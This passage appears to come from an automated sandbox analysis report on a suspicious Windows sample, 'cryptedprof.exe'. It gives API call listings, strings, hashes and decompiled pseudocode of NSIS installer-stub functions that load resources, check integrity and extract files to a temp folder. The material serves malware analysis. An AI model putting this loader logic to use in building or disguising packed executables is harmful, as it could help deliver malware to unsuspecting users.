                                                                                        0x00403efe
                                                                                        0x00000000
                                                                                        0x00403efe
                                                                                        0x00403edd
                                                                                        0x00403ee3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403ee5
                                                                                        0x00000000
                                                                                        0x00403ee5
                                                                                        0x00403ed5
                                                                                        0x00000000
                                                                                        0x00403ed5
                                                                                        0x00403ebb
                                                                                        0x00403ec2
                                                                                        0x00403ec8
                                                                                        0x00403eca
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403eca
                                                                                        0x00403e86
                                                                                        0x00000000
                                                                                        0x00403e64
                                                                                        0x00403e6a
                                                                                        0x00403e74
                                                                                        0x0040427b
                                                                                        0x00404281
                                                                                        0x00404283
                                                                                        0x00404289
                                                                                        0x0040428e
                                                                                        0x00404294
                                                                                        0x00404294
                                                                                        0x00404289
                                                                                        0x0040429e
                                                                                        0x00000000
                                                                                        0x0040429e
                                                                                        0x00403e62

                                                                                        APIs
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E39
                                                                                        • ShowWindow.USER32(?), ref: 00403E56
                                                                                        • DestroyWindow.USER32 ref: 00403E6A
                                                                                        • SetWindowLongA.USER32 ref: 00403E86
                                                                                        • GetDlgItem.USER32 ref: 00403EA7
                                                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403EBB
                                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403EC2
                                                                                        • GetDlgItem.USER32 ref: 00403F70
                                                                                        • GetDlgItem.USER32 ref: 00403F7A
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403F94
                                                                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403FE5
                                                                                        • GetDlgItem.USER32 ref: 0040408B
                                                                                        • ShowWindow.USER32(00000000,?), ref: 004040AC
                                                                                        • EnableWindow.USER32(?,?), ref: 004040BE
                                                                                        • EnableWindow.USER32(?,?), ref: 004040D9
                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004040EF
                                                                                        • EnableMenuItem.USER32 ref: 004040F6
                                                                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 0040410E
                                                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00404121
                                                                                        • lstrlenA.KERNEL32(0042A8B8,?,0042A8B8,00000000), ref: 0040414B
                                                                                        • SetWindowTextA.USER32(?,0042A8B8), ref: 0040415A
                                                                                        • ShowWindow.USER32(?,0000000A), ref: 0040428E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 4050669955-0
                                                                                        • Opcode ID: 0747cf473462c633210311af9825ea032a0e3c09bf9efde6129466eabca98a82
                                                                                        • Instruction ID: d5b7a152eccfdaa35e4c53a1a76e60acfbe2d5449824965e5503988bb7e30882
                                                                                        • Opcode Fuzzy Hash: 0747cf473462c633210311af9825ea032a0e3c09bf9efde6129466eabca98a82
                                                                                        • Instruction Fuzzy Hash: 34C1E671604204ABDB216F62EE85E2B3BB8FB85349F40053EF641B51F0CB795892DB2D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00403A60, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 96%
                                                                                        			E00403A60(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x42f454;
				_t17 = E00406656(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x42a8b8;
					"1033" = 0x30;
					 *0x436001 = 0x78;
					 *0x436002 = 0;
					E00406134(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a8b8, 0);
					__eflags =  *0x42a8b8;
					if(__eflags == 0) {
						E00406134(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a8b8, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					E004061AB("1033",  *_t17() & 0x0000ffff);
				}
				E00403D25(_t71, _t84);
				_t80 = "C:\\Users\\engineer\\AppData\\Local\\Temp";
				 *0x42f4e0 =  *0x42f45c & 0x00000020;
				 *0x42f4fc = 0x10000;
				if(E00405CD3(_t84, "C:\\Users\\engineer\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405CD3(_t92, _t80) == 0) {
						E004062E0(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x42f440, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42ec28 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403D25(_t71, __eflags);
							__eflags =  *0x42f500;
							if( *0x42f500 != 0) {
								_t28 = E00405446(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42ec0c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a898, 5); // executed
							_t34 = E004065E8("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E004065E8("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x42ebe0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42ebe0);
								 *0x42ec04 = _t81;
								RegisterClassA(0x42ebe0);
							}
							_t36 =  *0x42ec20; // 0x0
							_t39 = DialogBoxParamA( *0x42f440, _t36 + 0x00000069 & 0x0000ffff, 0, E00403DFD, 0); // executed
							E004039B0(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x42f440;
						 *0x42ebe4 = E00401000;
						 *0x42ebf0 =  *0x42f440;
						 *0x42ebf4 = _t25;
						 *0x42ec04 = 0x40a210;
						if(RegisterClassA(0x42ebe0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x42a898 = CreateWindowExA(0x80, 0x40a210, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f440, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x42e3e0;
					E00406134(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f498, 0x42e3e0, 0);
					_t57 =  *0x42e3e0; // 0x43
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x42e3e1;
						 *((char*)(E00405C10(0x42e3e1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E0040624D(_t80, E00405BE5(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405C2C(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                                                        0x00403a66
                                                                                        0x00403a6f
                                                                                        0x00403a76
                                                                                        0x00403a78
                                                                                        0x00403a8c
                                                                                        0x00403a9e
                                                                                        0x00403aa5
                                                                                        0x00403aac
                                                                                        0x00403ab2
                                                                                        0x00403ab7
                                                                                        0x00403abd
                                                                                        0x00403ad0
                                                                                        0x00403ad0
                                                                                        0x00403adb
                                                                                        0x00403a7a
                                                                                        0x00403a85
                                                                                        0x00403a85
                                                                                        0x00403ae0
                                                                                        0x00403aea
                                                                                        0x00403af3
                                                                                        0x00403af8
                                                                                        0x00403b09
                                                                                        0x00403b90
                                                                                        0x00403b98
                                                                                        0x00403ba1
                                                                                        0x00403ba1
                                                                                        0x00403bb7
                                                                                        0x00403bbd
                                                                                        0x00403bcb
                                                                                        0x00403c4c
                                                                                        0x00403c54
                                                                                        0x00403c5e
                                                                                        0x00403c63
                                                                                        0x00403c69
                                                                                        0x00403cf3
                                                                                        0x00403cf8
                                                                                        0x00403cfa
                                                                                        0x00403d16
                                                                                        0x00000000
                                                                                        0x00403d16
                                                                                        0x00403cfc
                                                                                        0x00403d02
                                                                                        0x00403d0a
                                                                                        0x00403d0a
                                                                                        0x00000000
                                                                                        0x00403d02
                                                                                        0x00403c77
                                                                                        0x00403c82
                                                                                        0x00403c87
                                                                                        0x00403c89
                                                                                        0x00403c90
                                                                                        0x00403c90
                                                                                        0x00403c9b
                                                                                        0x00403ca3
                                                                                        0x00403ca5
                                                                                        0x00403ca7
                                                                                        0x00403cb0
                                                                                        0x00403cb3
                                                                                        0x00403cb9
                                                                                        0x00403cb9
                                                                                        0x00403cbf
                                                                                        0x00403cd8
                                                                                        0x00403ce9
                                                                                        0x00000000
                                                                                        0x00403cee
                                                                                        0x00403c56
                                                                                        0x00403c58
                                                                                        0x00000000
                                                                                        0x00403bcd
                                                                                        0x00403bcd
                                                                                        0x00403bd9
                                                                                        0x00403be3
                                                                                        0x00403be9
                                                                                        0x00403bee
                                                                                        0x00403bfd
                                                                                        0x00403d1b
                                                                                        0x00403d1b
                                                                                        0x00000000
                                                                                        0x00403d1b
                                                                                        0x00403c0c
                                                                                        0x00403c47
                                                                                        0x00000000
                                                                                        0x00403c47
                                                                                        0x00403b0f
                                                                                        0x00403b0f
                                                                                        0x00403b12
                                                                                        0x00403b14
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403b1e
                                                                                        0x00403b2e
                                                                                        0x00403b33
                                                                                        0x00403b3a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403b3e
                                                                                        0x00403b40
                                                                                        0x00403b4d
                                                                                        0x00403b4d
                                                                                        0x00403b55
                                                                                        0x00403b5b
                                                                                        0x00403b83
                                                                                        0x00403b8b
                                                                                        0x00000000
                                                                                        0x00403b6d
                                                                                        0x00403b6e
                                                                                        0x00403b77
                                                                                        0x00403b7d
                                                                                        0x00403b7e
                                                                                        0x00000000
                                                                                        0x00403b7e
                                                                                        0x00403b79
                                                                                        0x00403b7b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403b7b
                                                                                        0x00403b5b

                                                                                        APIs
                                                                                          • Part of subcall function 00406656: GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                                                          • Part of subcall function 00406656: GetProcAddress.KERNEL32(00000000,?), ref: 00406683
                                                                                        • lstrcatA.KERNEL32(1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,747DFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\cryptedprof.exe" ,00000000), ref: 00403ADB
                                                                                        • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,747DFA90), ref: 00403B50
                                                                                        • lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000), ref: 00403B63
                                                                                        • GetFileAttributesA.KERNEL32(Call), ref: 00403B6E
                                                                                        • LoadImageA.USER32 ref: 00403BB7
                                                                                          • Part of subcall function 004061AB: wsprintfA.USER32 ref: 004061B8
                                                                                        • RegisterClassA.USER32 ref: 00403BF4
                                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C0C
                                                                                        • CreateWindowExA.USER32 ref: 00403C41
                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403C77
                                                                                        • GetClassInfoA.USER32 ref: 00403CA3
                                                                                        • GetClassInfoA.USER32 ref: 00403CB0
                                                                                        • RegisterClassA.USER32 ref: 00403CB9
                                                                                        • DialogBoxParamA.USER32 ref: 00403CD8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                        • String ID: "C:\Users\user\Desktop\cryptedprof.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$B
                                                                                        • API String ID: 1975747703-594791916
                                                                                        • Opcode ID: ab99cccd9c0ddd3d495b147680853500dcd9db92bcd335ab5c1b079dcb87365f
                                                                                        • Instruction ID: 8734c0f5f73e26911640e72846d54346a9337973c4420bd4a4a6803de24d7ebf
                                                                                        • Opcode Fuzzy Hash: ab99cccd9c0ddd3d495b147680853500dcd9db92bcd335ab5c1b079dcb87365f
                                                                                        • Instruction Fuzzy Hash: 1B61C6702042007EE620BF669D46F373AACDB4474DF94443FF945B62E2CA7DA9068A2D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402EF1, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 208memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 96%
                                                                                        			E00402EF1(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				intOrPtr _t100;
				void* _t104;
				intOrPtr _t105;
				long _t106;
				long _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x42f450 = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\engineer\\Desktop\\cryptedprof.exe", 0x400);
				_t104 = E00405DE6("C:\\Users\\engineer\\Desktop\\cryptedprof.exe", 0x80000000, 3);
				 *0x40a018 = _t104;
				if(_t104 == 0xffffffff) {
					return "Error launching installer";
				}
				E0040624D("C:\\Users\\engineer\\Desktop", "C:\\Users\\engineer\\Desktop\\cryptedprof.exe");
				E0040624D(0x437000, E00405C2C("C:\\Users\\engineer\\Desktop"));
				_t54 = GetFileSize(_t104, 0);
				 *0x429470 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402E52(1);
					if( *0x42f458 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						_t105 = 8;
						 *0x415458 = 0x40d450;
						 *0x415454 = 0x40d450;
						 *0x40b8b0 = _t105;
						 *0x40bdcc = 0;
						 *0x40bdc8 = 0;
						 *0x415450 = 0x415450; // executed
						E00405E15( &_v300, "C:\\Users\\engineer\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E0040343E( *0x42f458 + 0x1c);
							 *0x429474 = _t65;
							 *0x429468 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E004031B7(_v16, 0xffffffff, 0, _t110, _v20); // executed
							if(_t68 == _v20) {
								 *0x42f454 = _t110;
								 *0x42f45c =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x42f460 =  *0x42f460 + 1;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t100 = _t105;
								do {
									_t70 = _t70 - _t105;
									 *_t70 =  *_t70 + _t110;
									_t100 = _t100 - 1;
								} while (_t100 != 0);
								 *((intOrPtr*)(_t110 + 0x3c)) =  *0x429464;
								E00405DA1(0x42f480, _t110 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E0040343E( *0x429460);
					if(E00403428( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42f458) & 0x00007e00) + 0x200;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						if(E00403428(0x421460, _t106) == 0) {
							E00402E52(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42f458 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402E52(0);
							}
							goto L19;
						}
						E00405DA1( &_v40, 0x421460, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x42f500 =  *0x42f500 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x42f458 =  *0x429460;
							if(_t92 > _t109) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t109 = _t92 - 4;
								if(_t106 > _t109) {
									_t106 = _t109;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t109 <  *0x429470) {
							_v8 = E0040670D(_v8, 0x421460, _t106);
						}
						 *0x429460 =  *0x429460 + _t106;
						_t109 = _t109 - _t106;
					} while (_t109 != 0);
					goto L22;
				}
			}




























                                                                                        0x00402eff
                                                                                        0x00402f02
                                                                                        0x00402f1c
                                                                                        0x00402f21
                                                                                        0x00402f34
                                                                                        0x00402f39
                                                                                        0x00402f3f
                                                                                        0x00000000
                                                                                        0x00402f41
                                                                                        0x00402f52
                                                                                        0x00402f63
                                                                                        0x00402f6a
                                                                                        0x00402f72
                                                                                        0x00402f77
                                                                                        0x00402f79
                                                                                        0x00403067
                                                                                        0x00403069
                                                                                        0x00403075
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040307e
                                                                                        0x004030aa
                                                                                        0x004030af
                                                                                        0x004030b5
                                                                                        0x004030be
                                                                                        0x004030bf
                                                                                        0x004030c4
                                                                                        0x004030d5
                                                                                        0x004030db
                                                                                        0x004030e1
                                                                                        0x004030e7
                                                                                        0x004030f1
                                                                                        0x0040310c
                                                                                        0x00403115
                                                                                        0x0040311a
                                                                                        0x00403139
                                                                                        0x00403149
                                                                                        0x0040315b
                                                                                        0x00403160
                                                                                        0x00403168
                                                                                        0x00403175
                                                                                        0x0040317d
                                                                                        0x00403182
                                                                                        0x00403184
                                                                                        0x00403184
                                                                                        0x0040318a
                                                                                        0x0040318a
                                                                                        0x0040318d
                                                                                        0x0040318f
                                                                                        0x0040318f
                                                                                        0x00403191
                                                                                        0x00403193
                                                                                        0x00403193
                                                                                        0x0040319d
                                                                                        0x004031a9
                                                                                        0x00000000
                                                                                        0x004031ae
                                                                                        0x00000000
                                                                                        0x00403168
                                                                                        0x00000000
                                                                                        0x0040311c
                                                                                        0x00403086
                                                                                        0x00403098
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00402f7f
                                                                                        0x00402f7f
                                                                                        0x00402f84
                                                                                        0x00402f88
                                                                                        0x00402f8f
                                                                                        0x00402f96
                                                                                        0x00402f98
                                                                                        0x00402f98
                                                                                        0x00402fa7
                                                                                        0x00403128
                                                                                        0x0040316a
                                                                                        0x00000000
                                                                                        0x0040316a
                                                                                        0x00402fb3
                                                                                        0x00403037
                                                                                        0x0040303a
                                                                                        0x0040303f
                                                                                        0x00000000
                                                                                        0x00403037
                                                                                        0x00402fc0
                                                                                        0x00402fc5
                                                                                        0x00402fcd
                                                                                        0x00402ff3
                                                                                        0x00403002
                                                                                        0x00403008
                                                                                        0x0040300d
                                                                                        0x00403013
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040301d
                                                                                        0x00403025
                                                                                        0x00403028
                                                                                        0x0040302d
                                                                                        0x0040302f
                                                                                        0x0040302f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040301d
                                                                                        0x00403040
                                                                                        0x00403046
                                                                                        0x00403056
                                                                                        0x00403056
                                                                                        0x00403059
                                                                                        0x0040305f
                                                                                        0x0040305f
                                                                                        0x00000000
                                                                                        0x00402f7f

                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00402F05
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\cryptedprof.exe,00000400), ref: 00402F21
                                                                                          • Part of subcall function 00405DE6: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\cryptedprof.exe,80000000,00000003), ref: 00405DEA
                                                                                          • Part of subcall function 00405DE6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\cryptedprof.exe,C:\Users\user\Desktop\cryptedprof.exe,80000000,00000003), ref: 00402F6A
                                                                                        • GlobalAlloc.KERNELBASE(00000040,0040A130), ref: 004030AF
                                                                                        Strings
                                                                                        • soft, xrefs: 00402FE1
                                                                                        • C:\Users\user\Desktop, xrefs: 00402F4C, 00402F51, 00402F57
                                                                                        • C:\Users\user\Desktop\cryptedprof.exe, xrefs: 00402F0B, 00402F1A, 00402F2E, 00402F4B
                                                                                        • Error launching installer, xrefs: 00402F41
                                                                                        • Inst, xrefs: 00402FD8
                                                                                        • "C:\Users\user\Desktop\cryptedprof.exe" , xrefs: 00402EF1
                                                                                        • Null, xrefs: 00402FEA
                                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 0040316A
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EFB, 004030CF
                                                                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040311C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                        • String ID: "C:\Users\user\Desktop\cryptedprof.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\cryptedprof.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                        • API String ID: 2803837635-4063356020
                                                                                        • Opcode ID: c7140cee4d51e81b519843824b21cc99042816bf3a65f540c359333e0c5614f7
                                                                                        • Instruction ID: e8b4360117e31fb5ea1b260af931ada4a8b54667cc236f60df091846fad1fe42
                                                                                        • Opcode Fuzzy Hash: c7140cee4d51e81b519843824b21cc99042816bf3a65f540c359333e0c5614f7
                                                                                        • Instruction Fuzzy Hash: B471D171A00204ABDB20AF64DD45B9A7BB8EB14719F60803BE505BB2D1D77CAE468B5C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 75%
                                                                                        			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402BCE(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405C52(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405BE5(E0040624D(0x40a450, "C:\\Users\\engineer\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x40a450);
					E0040624D();
				}
				E00406528(0x40a450);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E004065C1(0x40a450);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405DC1(0x40a450);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405DE6(0x40a450, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00405374(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42f4e8;
						goto L32;
					} else {
						E0040624D(0x40ac50, 0x430000);
						E0040624D(0x430000, 0x40a450);
						E004062E0(_t75, 0x40ac50, 0x40a450, "C:\Users\engineer\AppData\Local\Temp\nsl227.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E0040624D(0x430000, 0x40ac50);
						_t62 = E00405969("C:\Users\engineer\AppData\Local\Temp\nsl227.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42f4e8 =  &( *0x42f4e8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x40a450);
								_push(0xfffffffa);
								E00405374();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00405374(0xffffffea,  *(_t85 - 8));
				 *0x42f514 =  *0x42f514 + 1;
